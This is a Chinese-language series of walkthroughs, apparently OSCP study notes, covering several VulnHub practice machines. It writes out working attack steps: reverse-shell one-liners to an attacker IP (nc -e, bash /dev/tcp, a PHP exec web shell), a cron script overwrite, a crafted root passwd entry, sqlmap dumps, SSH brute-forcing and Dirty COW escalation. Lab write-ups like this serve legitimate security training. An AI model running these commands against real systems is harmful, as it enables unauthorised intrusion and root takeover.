“突破重围：探索OSCP渗透测试场景中的难题与解决方案“

  Linux Passwd提取

靶机地址:DC: 9 ~ VulnHub

通过Web信息收集 进入内网 提示:有Sql注入 knock或nc敲门 文件包含

进入内网收集信息 然后再次对用户进行ssh爆破

发现可疑文件

发现这个文件可执行

普通用户无权限执行

发现hydra爆破出来的ssh用户有 sudo权限

test内容为:

普通用户无法查看/etc/shadow文件

但是通过sudo配合 test文件即可

然后passwd提权即可

获取 哈希值

perl -le 'print crypt("123456","hacker")' #用户为:hacker 密码为:123456

在通过此语句写入到/tmp/1 的文件里面

echo "hacker:hazsR9UJJSGrk:0:0:hacker_lai_la:/tmp/:/bin/bash" >/tmp/1

然后查看文件内容

然后切换到hacker用户 即为root权限

SolidState 邮箱泄露导致获取shell

靶机地址:SolidState: 1 ~ VulnHub

通过谷歌搜索 以及百度搜索来利用此靶机

nmap扫描

4555端口存在泄露

telnet 192.168.52.166 4555 直连 默认用户:root 默认密码:root

修改密码后登录telnet登录110端口

看到有2个邮箱

retr 1 retr2 都看一下 第二个有用户和密码

尝试ssh连接

使用searchsploit 50347.py 漏洞 通过前期信息收集知道靶机存在JAMES 2.3.2有这个payload漏洞

渗透机监听本地5555端口

然后ssh在连接靶机 这样就无限制 因为靶机有一些限制

这样就反弹进去了

进入靶机后 进/opt 目录有一个tmp.py文件 直接修改文件即可 因为任何用户都有修改权限 他每2分钟执行一次

echo "import os;os.system('/bin/nc 192.168.52.128 9999 -e /bin/bash')" >/opt/tmp.py 直接将原有的tmp里面内容更改为我们上面输入的内容

攻击机监听9999端口 等待2分钟连接即可

Linux suid提权

靶机地址:https://www.vulnhub.com/entry/escalate_linux-1,323

通过扫描目录发现存在shell.php 提示密码为cmd

通过反弹shell来进行获取终端

/bin/bash -c 'bash -i >&/dev/tcp/192.168.52.128/5555 0>&1'

首先创建一个非终端

export TERM=xterm

使用find提权 发现存在可以文件

find / -perm -u=s -type f 2 >/dev/null

通过strings shell 来查看文件里面字符串 发现可以文件

在里面增加这3条命令

然后运行shell 会在tmp下增加一个sh文件

然后运行./sh -p 其实就是 bash -p

成功提权到root

Linux 可执行文件提权

靶机地址:hackme: 1 ~ VulnHub

最后终端结果图

首先使用nmap扫描

nmap -sV -p- --script=vuln --min-rate 1000 192.168.52.165 -sC

进行目录扫描:

靶机开启80端口进行尝试访问

尝试万能密码 万能用户无果 发现可注册用户

注册完后登录

存在sql注入 是post传参 Burpsuite抓包 然后保存到 直接sqlmap跑即可

python3 sqlmap.py -r /home/hacker/ba/sql.txt -D webapphacking -T users --dump --batch

靶机开开启一个ssh端口 把这些帐户密码收集起来 进行ssh爆破

发现ssh爆破不成功,突然发现还有一个superadmin用户 密码被加密没解出来

尝试解密:MD5免费在线解密破解_MD5在线加密-SOMD5

在此尝试ssh登录发现还是无果,然后想起Web还有一个登录界面试试能不能登录上去

登录上去之后发现有文件上传 直接文件上传 然后结合第一开始扫描到的upload目录 连接

进行反弹shell

进行提权: 尝试内核提权以及apache提权均无果后,进行suid提权

发现可疑文件 存在suid权限

查看该文件,发现存在suid 凭感觉可能是权限 然后此文件还可以运行 运行一下试试.

成功提权到root结束战斗 来自2023年6月22 端午节渗透内容.

Linux脏牛提权+配合apache2.2.15解析漏洞

靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/

脏牛地址:https://github.com/firefart/dirtycow/blob/master/README.md

通过nmap扫描以及对网页做信息收集,得到用户密码然后登录

网页首页

可能是目录直接尝试

确实是 查看源代码是否有信息 滑到地发现base64加密

为了方便直接浏览器解密

data:image/jpeg;base64,加密 直接下载

下载后的内容为:

猜测可能是密码:继续查看源代码

可能是用户

尝试登录

上传图片马即可 然后通过反弹shell到内容 最后使用脏牛提权即可.

正常bash反弹进不去

通过base64加密然后管道符bash即可

进入内容直接脏牛提权.

Tomcat渗透|kncok敲门|文件读取

靶机地址:digitalworld.local: MERCY v2 ~ VulnHub

通过nmap扫描

发现开启smb 直接enumlinux4 枚举

enumlinux4 192.168.52.173

发现3个文件共享目录

通过信息收集靶机有qiu等多个用户存在

通过Web页面得知密码是passwd 尝试

smbclient \\\\192.168.52.173\\qiu -U qiu

下载里面敏感文件

然后使用config配置文件敲开80和22端口

然后访问网页robots 发现存在如下二个目录程序

发现靶机nomercy存在rips 0.53版本

searchsploit rips 0.53 直接复制粘贴payload

文件读取成功

读取tomcat 配置文件

使用用户密码登录 然后将jsp反弹木马打包为war上传

jsp反弹shell地址:https://github.com/LaiKash/JSP-Reverse-and-Web-Shell/blob/main/shell.jsp

jar -cf shell.war reverse.jsp 打包 然后上传

nc反弹成功

接下来直接切换用户为 fluffy 密码就是之前我们在网页中读取到的

在里面追加内容 因为文件可读可写可执行

等几分钟/tmp目录下会产生sh文件

然后直接俄

./sh -p 即可到root权限

ProFTPD 1.2.10 任意文件复制

靶机地址:digitalworld.local: JOY ~ VulnHub

第一步发现主机: sudo arp-scan -l

第二步:nmap扫描端口

存在匿名用户登录 匿名登进去下载一些东西但并没有什么价值 所以这条线路行不通

searchsploit 尝试搜索漏洞 但也没有发现什么价值信息 有一个拒绝服务和枚举用户 所以这条也放弃了

发现开放80端口进行访问 发现是ossec 0.8版本

还是拒绝服务

发现存在可疑参数 尝试读取文件 也行不通 扫描目录等等都没价值信息 放弃80端口然后转为445端口枚举

enum4linux 192.168.52.174 发现3个用户

通过在搜索引擎搜索 ProFTPD 存在未授权任意文件复制 那么我们可以从这点突破 然后反弹shell

使用telnet连接 因为telnet协议是只有文本

为什么我知道/home/ftp/passwd2路径 因为enum4linux我们已经枚举到几个用户

刚好ftp对应ftp服务所以试一下就知道了

ftp连接进去查看 可以看到已经复制进来

下载计划任务 然后修改在通过任意文件复制到服务器计划任务

ftp下载

写入我们的反弹shell

先上传到ftp上 然后由ftp任意文件复制的漏洞上传到靶机

等待1分钟成功反弹shell

PHP Blog 0.4漏洞以及创建用户|文件上传

靶机地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

首先端口扫描:Nmap,Goby,masscan都可以 靶场推荐Nmap 项目实战推荐goby

看到Openssh 5.8 这个确实没洞 因为遇到好多次

看到开放25端口 查看也无结果

smtp也无结果

查看80端口 发现版本也无价值漏洞

dirsearch目录扫描后发现login 直接尝试万能密码登录

查看源代码以及其他信息后 发现并没有什么有用信息

发现blog目录

尝试访问然后查看源代码

searchsploit搜索此漏洞

然后直接使用 -e 指定利用 -U 用户名 -P 密码

回到刚才扫描到的目录直接 admin|admin 登录

登录后 这边存在一个文件上传 上传shell.php

shell.php 里面内容（<?php exec("/bin/bash -c 'bash -i >&/dev/tcp/127.0.0.1/5555 0>&1'");?>）

渗透机器监听:nc -lvp 5555

直接可以上传php 然后去/blog/images 目录去找刚才我们上传文件即可

直接就反弹shell了 因为这里我的靶机好像存在问题 所以一直没反弹shell成功 尝试了perl,python,bash,sh等反弹都不可以.琢磨了一下午最后使用杀手锏然而页面却出现了

翻译为:WARNING: Failed to daemonise. This is quite common and not fatal. No route to host (113)警告:守护进程失败。这很常见，但并不致命。没有到主机的路由(113)

所以可以看到是靶机问题.

2023年7月1日 18:05分 去吃饭咯

Linux信息收集

靶机地址:Misdirection: 1 ~ VulnHub

基本稍微有一点基础就